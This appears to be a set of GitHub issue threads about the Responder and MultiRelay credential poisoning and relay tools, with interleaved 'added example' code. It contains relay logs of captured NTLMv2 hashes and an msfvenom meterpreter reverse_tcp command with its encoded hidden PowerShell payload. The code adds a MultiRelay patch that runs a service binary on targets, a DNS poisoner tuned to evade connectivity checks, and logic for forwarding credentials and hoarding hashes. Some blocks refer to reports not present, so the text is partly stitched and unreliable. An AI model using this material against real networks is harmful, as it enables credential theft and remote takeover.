Hostname: 'VICTIM'
Part of the 'XXX' domain
[+] Setting up HTTP relay with SMB challenge: 304d7e8ae7fd8020
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: 53e6bdf9e74a60a8
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: dee8991c69c1f474
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: 00d5290e757f2f6f
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: e88b1f8cddebdaad
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.

br-lan

Will responder capture across a br-lan interface?

about MultiRelay and SMBRelayX

I set up a lab as follows:
inventory PC: Win10 172.24.20.65
middle: Kali 172.24.20.81
target: Win2008R2 172.24.20.57

Workgroup environment.

I used Responder to poison the inventory PC, and relayed to the target through the middle box.

  1. Using MultiRelay returns a logon_failure.

  2. Using SMBRelayX returns access_denied; I know this error is because the target has UAC on.

Why, in the same environment, do the two tools return different results?

Fingerprint host Failed

I am currently using Responder on my NetHunter with USB tethering on my OnePlus One. I get a "Fingerprint host failed" error whenever I use it with the screen locked on my Win10 Pro. It works with the screen unlocked too, but only as a MITM WPAD method. It doesn't capture the NTLM hashes when the Windows machine is in a workgroup.

MultiRelay: very long shell commands parsing issue

Hi there,

if I try to use a meterpreter powershell payload inside the MultiRelay shell, strange things start to happen :)

Example:
#Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.178 LPORT=4444 -e x86/shikata_ga_nai -f psh-cmd

#msfvenom output with a length of 6447 chars in total:
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA
...
QAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

  • If I just paste it into the shell, my payload will be cut into several pieces and fed to the client resulting in no compromised host.

  • If I specify the payload inside the -c parameter, MultiRelay will crash with the Message "Something went wrong"

I could set up a http server to get the file with powershell, but it would definitely be nice if I could just throw the payload inside the shell.

Thanks for looking into this.

MultiRelay.py "-c" OneCommand wrongly calls the RunCmd function

MultiRelay.py, lines 561-570, implements the "-c" option as follows:

    ## Run one command.
    if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
        print "[+] Authenticated."
        if OneCommand != None:
           print "[+] Running command: %s"%(OneCommand)
           RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
        if Dump:
           print "[+] Dumping hashes"
           DumpHashes(data, s, Target[0])
        os._exit(1)

The issue here is that it is calling the function "RunCmd" with only 8 arguments when it should be calling it with 10 arguments.

MultiRelay/RelayMultiCore.py defines that function :

def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, FileName):

This causes calling MultiRelay.py with the "-c" option to fail to execute the "OneCommand" argument, and it hangs there because the exception is not properly handled.

I fixed this issue by implementing the "OneCommand" execution as you implemented the normal "cmd[]" execution. MultiRelay.py: lines 755-766.

The end result that worked for me is:

    ## Run one command.
    if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
        print "[+] Authenticated."
        if OneCommand != None:
           print "[+] Running command: %s"%(OneCommand)
           try:
                if os.path.isfile(SysSVCFileName):
                      FileSize, FileContent = UploadContent(SysSVCFileName)
                      FileName = os.path.basename(SysSVCFileName)
                      RunPath = '%windir%\\Temp\\'+FileName
                      data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
                      data = RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0], RunPath,FileName)
                else:
                    print SysSVCFileName+" does not exist, please specify a valid file."
           except Exception as e:
               print "Ups! something went wrong while calling RunCmd\n"
               print e
        if Dump:
           print "[+] Dumping hashes"
           DumpHashes(data, s, Target[0])
        os._exit(1)

Perhaps you could add this fix to the code as well.

DumpHash.py Error

Whenever I run DumpHash.py, it spits out an error. For whatever reason, I got some weird output in my Responder that looks like Chinese characters. I believe this might be the root cause.

Dumping NTLMV2 hashes:
Traceback (most recent call last):
  File "./DumpHash.py", line 43, in <module>
    v2 = GetResponderCompleteNTLMv2Hash(cursor)
  File "./DumpHash.py", line 31, in GetResponderCompleteNTLMv2Hash
    Output += '{0}'.format(row[0])+'\n'
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)
             ��Ò舕̆▀ༀ叧쀮玘ਤ埘钮hostname
[SMBv2] NTLMv2-SSP Hash     : 䵌卓P���¢��º��Xv��
                                                ��Ò舕̆▀ༀ叧쀮玘ਤ埘钮hostname::䵌卓P���¢��º��Xv��
                             ��Ò舕̆▀ༀ叧쀮玘ਤ埘钮S:49b183a9c2971aff:4C4D535350000300000018001800A200:000018001800BA0000001E001E00580000000E000E00760000001E001E008400[redacted]
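Two of the reports above fail inside the same database: Report.py dies with "no such table: Poisoned" when it is run before Responder has written anything, and DumpHash.py dies with UnicodeEncodeError once a captured name contains characters the Python 2 default ascii codec cannot emit (the '䵌卓P' prefix is the bytes "LMSS" "P" of the NTLMSSP signature read as UTF-16LE, which points at the name being sliced from the wrong offset in the Type 3 message). The script below is an added example, not Responder's Report.py or DumpHash.py: it assumes the two tables Responder creates, Poisoned and Responder, with the columns listed (check utils.py for your version), creates them if they are missing, and returns the hash dump as UTF-8 bytes so the encoding of the terminal never matters. All rows are constructed; the third user name imitates the garbled field from the issue.

```python
"""Reading Responder.db without the two crashes above.

Added example, not Responder's Report.py or DumpHash.py. Table layout is an
assumption matching what Responder's utils.py creates; rows are constructed.
"""
import sqlite3
import sys

TABLES = {
    "Poisoned": "timestamp TEXT, Poisoner TEXT, SentToIp TEXT, ForName TEXT, AnalyzeMode TEXT",
    "Responder": ("timestamp TEXT, module TEXT, type TEXT, client TEXT, hostname TEXT, "
                  "user TEXT, cleartext TEXT, hash TEXT, fullhash TEXT"),
}


def _line(user, chal, proof):
    """Constructed hashcat-style line; the blob is dummy bytes."""
    return f"{user}::XXX:{chal}:{proof}:0101{'00' * 20}"


POISONED_ROWS = [  # constructed
    ("2017-01-01 10:00:00", "LLMNR", "10.0.0.10", "printsrv", "0"),
    ("2017-01-01 10:00:03", "LLMNR", "10.0.0.10", "PRINTSRV", "0"),   # same name, other case
]
RESPONDER_ROWS = [  # constructed; second row is a duplicate capture, third imitates the garbled name
    ("2017-01-01 10:00:05", "SMBv2", "NTLMv2-SSP", "10.0.0.10", "WS01", "bob", "", "aa" * 16,
     _line("bob", "1122334455667788", "aa" * 16)),
    ("2017-01-01 10:00:09", "SMBv2", "NTLMv2-SSP", "10.0.0.10", "WS01", "bob", "", "aa" * 16,
     _line("bob", "1122334455667788", "aa" * 16)),
    ("2017-01-01 10:01:00", "SMBv2", "NTLMv2-SSP", "10.0.0.11", "WS02", "䵌卓P", "", "bb" * 16,
     _line("䵌卓P", "49b183a9c2971aff", "bb" * 16)),
]


def open_db(path=":memory:"):
    """Open the database and make sure both tables exist, even before any capture."""
    conn = sqlite3.connect(path)
    for name, cols in TABLES.items():
        conn.execute(f"CREATE TABLE IF NOT EXISTS {name} ({cols})")
    return conn


def load_samples(conn):
    conn.executemany("INSERT INTO Poisoned VALUES (?,?,?,?,?)", POISONED_ROWS)
    conn.executemany("INSERT INTO Responder VALUES (?,?,?,?,?,?,?,?,?)", RESPONDER_ROWS)
    conn.commit()


def unique_lookups(conn):
    """One row per (client, name, poisoner); names compared case-insensitively."""
    return conn.execute(
        "SELECT SentToIp, UPPER(ForName), Poisoner FROM Poisoned "
        "GROUP BY SentToIp, UPPER(ForName), Poisoner ORDER BY SentToIp, Poisoner"
    ).fetchall()


def unique_hashes(conn, ntlm_type="NTLMv2"):
    """Distinct full hashes of one type, in order of first capture."""
    rows = conn.execute(
        "SELECT fullhash FROM Responder WHERE type LIKE ? GROUP BY fullhash ORDER BY MIN(timestamp)",
        (ntlm_type + "%",),
    )
    return [r[0] for r in rows]


def dump_hashes(conn, ntlm_type="NTLMv2"):
    """Bytes for a hashcat/john input file. UTF-8 represents any name SQLite
    returns; the ascii codec that Python 2 picked by default did not."""
    return b"".join(h.encode("utf-8", errors="replace") + b"\n"
                    for h in unique_hashes(conn, ntlm_type))


if __name__ == "__main__":
    conn = open_db()
    print("lookups on an empty db:", unique_lookups(conn))   # [] instead of a traceback
    load_samples(conn)
    print("unique lookups:", unique_lookups(conn))
    sys.stdout.buffer.write(dump_hashes(conn))
```

Writing the dump through sys.stdout.buffer (or to a file opened in binary mode) is the part that matters: it sidesteps the locale-dependent text encoding of stdout entirely, which is where the original traceback came from.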

Feature Request: Make victims believe they have Internet access

With a number of different scenarios I've been in the situation where I was the gateway for a host. When they perform detection on if they are Internet connected (random host lookup), it would be nice to respond to these in the DNS server with what is supposed to happen naturally (NXDOMAIN)
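The reply the request asks for, as an added example that is not Responder's DNS.py: parse one DNS query from raw bytes and answer it either with an A record pointing at the attacker or with RCODE 3 (NXDOMAIN), which is what a random connectivity-check name would get from a real resolver. The allowlist follows the idea of the RespondToName filter in Responder.conf; how it would be wired into the real server is an assumption, and the query names and addresses below are constructed.

```python
"""Honest NXDOMAIN for unknown names, poisoned answer only for chosen names.

Added example, not Responder's DNS.py. Minimal wire format only: one question,
no EDNS, no compression in queries, a pointer to offset 12 in the answer.
"""
import struct

NXDOMAIN = 3


def build_query(name, txid=0x1234, qtype=1):
    """Constructed client query (IN class) used as sample input."""
    qname = b"".join(bytes([len(p)]) + p.encode("ascii") for p in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def parse_query(packet):
    """Return (txid, name, qtype, raw question section) of a single-question query."""
    txid = struct.unpack("!H", packet[:2])[0]
    labels, off = [], 12
    while packet[off] != 0:
        n = packet[off]
        labels.append(packet[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    off += 1                                        # root label
    qtype = struct.unpack("!H", packet[off:off + 2])[0]
    return txid, ".".join(labels), qtype, packet[12:off + 4]


def build_response(query, answer_ip=None, ttl=60):
    """answer_ip=None yields NXDOMAIN; otherwise one A record for the queried name."""
    txid, _, _, question = parse_query(query)
    if answer_ip is None:
        flags = 0x8180 | NXDOMAIN                   # QR, RD, RA, RCODE=3
        return struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0) + question
    rdata = bytes(int(o) for o in answer_ip.split("."))
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata   # name pointer -> offset 12
    return struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0) + question + rr


def rcode(response):
    return struct.unpack("!H", response[2:4])[0] & 0xF


def handle(query, poison_ip, respond_to_names):
    """Poison only A queries for allowlisted names; everything else fails honestly."""
    _, name, qtype, _ = parse_query(query)
    if qtype == 1 and name.lower() in {n.lower() for n in respond_to_names}:
        return build_response(query, poison_ip)
    return build_response(query, None)


if __name__ == "__main__":
    allow = {"wpad", "printsrv"}                    # constructed allowlist
    for qname in ("printsrv", "qwzxkrtpv", "WPAD"):
        r = handle(build_query(qname), "10.0.0.5", allow)
        print(f"{qname:12} rcode={rcode(r)} answers={struct.unpack('!H', r[6:8])[0]}")
```

A client that probes with random names and expects NXDOMAIN gets it, while the names you actually want to poison still resolve to you; a stricter variant would also set the response's RD bit from the query rather than hard-coding 0x8180.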

Is it possible to Capture hashes just by browsing the web?

Hello

I am wondering if there is a way to capture hashes just by browsing the web; the only way I seem to find is by accessing an incorrect location on the network, for example \\Printsrv.

What if the user on the targeted machine never accesses an incorrect location? Does it mean you will never be able to get the hashes?

I've seen tutorials on YouTube that it's possible with older versions of Responder, but I can't do it with version 2.3.3.6.

Any help would be appreciated

RunFinger.py has a missing 'W' in Windows

$ ./RunFinger.py -i 192.168.1.0/24 -g
['192.168.1.13', Os:'indows Server 2008 R2 Standard 7600', Domain:'MAFEKING', Signing:'True', Time:'2017-08-18 14:20:52']

Purely cosmetic, obviously.

Enhancement: Better MultiRelay interactive shell command execution

As I understand it, MultiRelay currently creates, starts, stops and uninstalls a service for each command line we want to execute on the victim host. https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L829
This is extremely inefficient, and also triggers alarms on IDS systems.

My suggestion is to use something like Impacket does. It basically creates one service that opens its own SMB pipe and accepts commands to execute in a separate process (also, the solution is open source, unlike the current method). Since the pipe handling is already implemented in this library, I believe it would be fairly easy:
https://github.com/CoreSecurity/impacket/blob/master/impacket/examples/remcomsvc.py
https://github.com/kavika13/RemCom

Failing to store different hash

Currently if the "same" user comes in that is already in the database then an authentication attempt is ignored, even if it's a different hash. This has resulted in missed hashes because of user's multiple attempts to authenticate using "other" passwords as well. I can't find an option to disable this work flow.
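Three of the reports above are about the same decision point, what to do with a credential that just arrived: ignore machine accounts under -u ALL, stop forwarding a user after a logon_failure (the guard whose message is printed but not enforced in the log excerpt), and keep a second, different hash for a user who is already in the database. The block below is an added example, not MultiRelay's code; it models the three rules as one policy object, replays a constructed event list that mirrors the log excerpt, and the class name and verdict strings are assumptions for illustration.

```python
"""Relay gating: skip machine accounts, honour the lockout guard, keep every distinct hash.

Added example, not MultiRelay's code. Verdict strings and the RelayPolicy
class are assumptions; EVENTS is a constructed capture sequence.
"""


class RelayPolicy:
    def __init__(self, users=("ALL",)):
        self.users = {u.lower() for u in users}   # -u ALL relays everybody
        self.failed = set()     # "domain\\user" keys that already returned logon_failure
        self.seen = set()       # (key, NTProofStr) pairs already stored
        self.hashes = []        # every distinct captured hash, in arrival order

    @staticmethod
    def key(domain, user):
        return f"{domain}\\{user}".lower()

    def store(self, domain, user, proof_hex):
        """Keep a capture unless this exact (user, hash) pair was stored before.
        Keying on the user alone is what loses the second password attempt."""
        pair = (self.key(domain, user), proof_hex.lower())
        if pair in self.seen:
            return False
        self.seen.add(pair)
        self.hashes.append(pair)
        return True

    def decide(self, domain, user, proof_hex):
        """Return 'forward' or a reason to skip; the hash is stored either way."""
        self.store(domain, user, proof_hex)
        if user.endswith("$"):
            return "skip: machine account"
        if "all" not in self.users and user.lower() not in self.users:
            return "skip: not whitelisted"
        if self.key(domain, user) in self.failed:
            return "skip: previous logon_failure, not forwarding to prevent lockout"
        return "forward"

    def record_result(self, domain, user, status):
        """Feed back the session-setup status of a relayed attempt."""
        if status == "logon_failure":
            self.failed.add(self.key(domain, user))
        elif status == "success":
            self.failed.discard(self.key(domain, user))


# Constructed: (domain, user, NTProofStr, outcome of the relay if it is forwarded)
EVENTS = [
    ("REDACTED", "REDACTED", "aa" * 16, "logon_failure"),
    ("REDACTED", "REDACTED", "bb" * 16, None),   # same user, new hash: stored, not relayed
    ("REDACTED", "REDACTED", "bb" * 16, None),   # exact repeat: stored once only
    ("XXX", "WS01$", "cc" * 16, None),           # machine account: noise under -u ALL
    ("XXX", "bob", "dd" * 16, "success"),
]


def replay(events, users=("ALL",)):
    policy = RelayPolicy(users)
    verdicts = []
    for domain, user, proof, outcome in events:
        verdict = policy.decide(domain, user, proof)
        verdicts.append(verdict)
        if verdict == "forward" and outcome:
            policy.record_result(domain, user, outcome)
    return verdicts, policy


if __name__ == "__main__":
    verdicts, policy = replay(EVENTS)
    for (_, user, _, _), verdict in zip(EVENTS, verdicts):
        print(f"{user:10} -> {verdict}")
    print(f"{len(policy.hashes)} distinct hashes stored")
```

The guard is a set keyed on domain\user that is consulted before forwarding, not a message printed after the decision; storing is done before the verdict so that a skipped credential is never lost for offline cracking.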
